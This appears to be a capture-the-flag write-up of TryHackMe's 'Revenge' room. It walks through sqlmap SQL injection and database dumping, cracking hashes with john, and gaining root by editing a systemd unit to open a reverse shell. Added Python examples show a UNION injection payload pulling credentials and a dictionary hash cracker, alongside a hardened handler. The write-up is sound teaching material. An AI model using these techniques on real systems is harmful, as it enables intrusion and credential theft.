TryHackMe write-up: Revenge


Introduction







This is my write-up for TryHackMe's Revenge room.  As can be seen in the note, this room is actually a continuation of another room, Blog.  The write-up for that room is at TryHackMe write-up: Blog.

After we hacked Billy's website, he tracks us down and sends us the following note.


Enumeration

Using nmap, I saw that this box has two ports open.


Checking port 80, we see that it is hosting the company's website:


I wanted to check the products page, so I opened the first product they were selling.


Interestingly, the product id is part of the URL; in this case it is http://10.10.151.163/products/1.  I then checked what would happen if I requested a non-existent product id, say 999: 



Exploitation

That response suggested the website was vulnerable to SQL injection.  To test it, I ran sqlmap with the following command:
sqlmap --current-db -u http://10.10.151.163/products/1

This is what I got after a while:


So I found that the database is named duckyinc.

I then ran sqlmap again, this time to dump all the data in the duckyinc database:
sqlmap -D duckyinc --dump -u http://10.10.151.163/products/1

Here I found a table named system_user, containing usernames, email addresses and password hashes.



Scrolling further down the sqlmap output, I saw another table named user.  Looking closer, I found a flag (the first of the room) in the credit_card column.
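To make concrete what sqlmap is exploiting here, below is an added example (not code from the room or from this write-up) of a hypothetical /products/<id> handler that builds its query the vulnerable way, next to a hardened version. The database is a constructed in-memory SQLite stand-in: the products and system_user table names follow the write-up, but every row in it is made up. It reproduces the three observations from the enumeration step, a real id returning rows, a bogus id (999) returning nothing, and a stray quote producing a database error, and then uses the same injection point to pull the system_user table out with a UNION, which is the kind of thing sqlmap automates with --dump.

```python
import sqlite3

# Constructed stand-in for the duckyinc database the write-up dumps with sqlmap.
# Table and column names follow the write-up (products, system_user); the rows
# themselves are made up for this demo and are not the room's data.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
INSERT INTO products VALUES (1, 'Rubber Duck', '9.99');
INSERT INTO products VALUES (2, 'Duck Tape', '4.50');
CREATE TABLE system_user (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
INSERT INTO system_user VALUES (1, 'admin', 'admin@duckyinc.example', '$6$salt$fakehash1');
INSERT INTO system_user VALUES (2, 'billy', 'billy@duckyinc.example', '$6$salt$fakehash2');
"""


def connect():
    """Fresh in-memory database loaded with the constructed schema above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def product_vulnerable(conn, product_id):
    """Hypothetical handler behind /products/<id>: the path segment is
    pasted into the SQL text, so whatever follows the number becomes SQL."""
    sql = "SELECT name, price FROM products WHERE id = %s" % product_id
    return conn.execute(sql).fetchall()


def product_safe(conn, product_id):
    """Hardened version: validate the id as an integer, then bind it as a
    parameter so the database never sees attacker-controlled SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        return []  # '999 UNION ...' or '1 OR 1=1' never reaches the database
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (pid,)).fetchall()


def probe(conn, product_id):
    """Classify the page response the way a tester (or sqlmap) reads it:
    'rows', 'empty' or 'error'.  An error on a stray quote, and different
    answers to 'AND 1=1' versus 'AND 1=2', are the signs of injection."""
    try:
        rows = product_vulnerable(conn, product_id)
    except sqlite3.OperationalError:
        return "error"
    return "rows" if rows else "empty"


def dump_system_user(conn):
    """UNION-based extraction through the vulnerable handler: the non-existent
    id 999 empties the real result set, so only the injected rows come back."""
    payload = "999 UNION SELECT username, password FROM system_user"
    return sorted(product_vulnerable(conn, payload))
```

The UNION works because the injected SELECT returns the same number of columns (two) as the original query; sqlmap finds that column count for you, and with --dump walks every table the same way. Note that product_safe rejects the payloads outright instead of trying to escape them: an integer path parameter should never be interpolated into SQL at all.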


I then copied the hashes from both the system_user and user tables and let john try to crack them.  After a while, it cracked one of them.  I then used that password to log in over SSH.
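For readers who have not used john before, the following added example (my own code, not the author's, and not what john actually runs) shows the dictionary attack it performs on unsalted hashes: guess the algorithm from the digest length, hash every wordlist entry, and compare. The dumped hashes and the wordlist are constructed for the demo (the digests are of well-known test strings, not the room's hashes, and the write-up does not say which hash format the room uses). The third entry is a bcrypt-shaped string, included to show that salted or adaptive formats are where you hand over to john or hashcat rather than a few lines of hashlib.

```python
import hashlib

# Constructed sample in the shape sqlmap dumps from a users table:
# (username, password hash).  The digests are of well-known test strings;
# they are not the room's real hashes.
DUMPED = [
    ("webmaster", "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8"),  # sha256
    ("sysadmin", "e10adc3949ba59abbe56e057f20f883e"),  # md5
    ("billy", "$2b$12$" + "x" * 53),  # bcrypt-shaped placeholder, not handled here
]

# Constructed wordlist standing in for rockyou.txt or similar.
WORDLIST = ["letmein", "password", "123456", "ducky", "welcome1"]

# Unsalted hex digest length -> hashlib algorithm name.
ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def identify(h):
    """Return the hashlib name for a bare hex digest, or None for anything
    else.  crypt(3)-style strings ($6$..., $2b$...) carry a salt and cost
    parameter and are left to john or hashcat."""
    if h.startswith("$") or any(c not in "0123456789abcdef" for c in h.lower()):
        return None
    return ALGO_BY_LEN.get(len(h))


def crack(h, wordlist):
    """Dictionary attack: hash each candidate with the identified algorithm
    and compare.  Returns the plaintext or None."""
    algo = identify(h)
    if algo is None:
        return None
    target = h.lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


def crack_all(dumped, wordlist):
    """Map each dumped username to its recovered password (None if uncracked)."""
    return {user: crack(h, wordlist) for user, h in dumped}
```

Length-based identification is only a heuristic (a 64-character hex string could be SHA3-256 or BLAKE2s as well); john and hashcat make the same kind of guess and let you override it, which is why checking the format the application actually uses is worth the time before a long cracking run.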

Once I logged in, I was able to get the 2nd flag.



Privilege Escalation

Running sudo -l, I found that I could run systemctl and sudoedit commands as root.



However, the rule only allowed me to start or restart a single service and to edit its unit file.  

Using sudoedit, I found that I could edit /etc/systemd/system/duckyinc.service.  Below is what the .service file looked like after editing.


I changed the user to root to make sure that the service ran as root.  I also added the ExecStartPre line, which spawns a reverse shell back to my attacking machine before the gunicorn process is started.

Given that I changed the service's configuration, I had to restart it.  I ran the following commands for this:



Once the service restarted, I got a connection on my netcat listener.  However, I just couldn't find the 3rd flag.  Looking back at the note and the hint provided in the room, it turned out that I had to deface the website's front page first.  To do so, I simply modified the file index.html found in /var/www/duckyinc/templates.  The defaced front page is shown below:


Notice that I only made a slight change to index.html.  Yet when I restarted the service and checked the reverse shell, I found the 3rd flag.


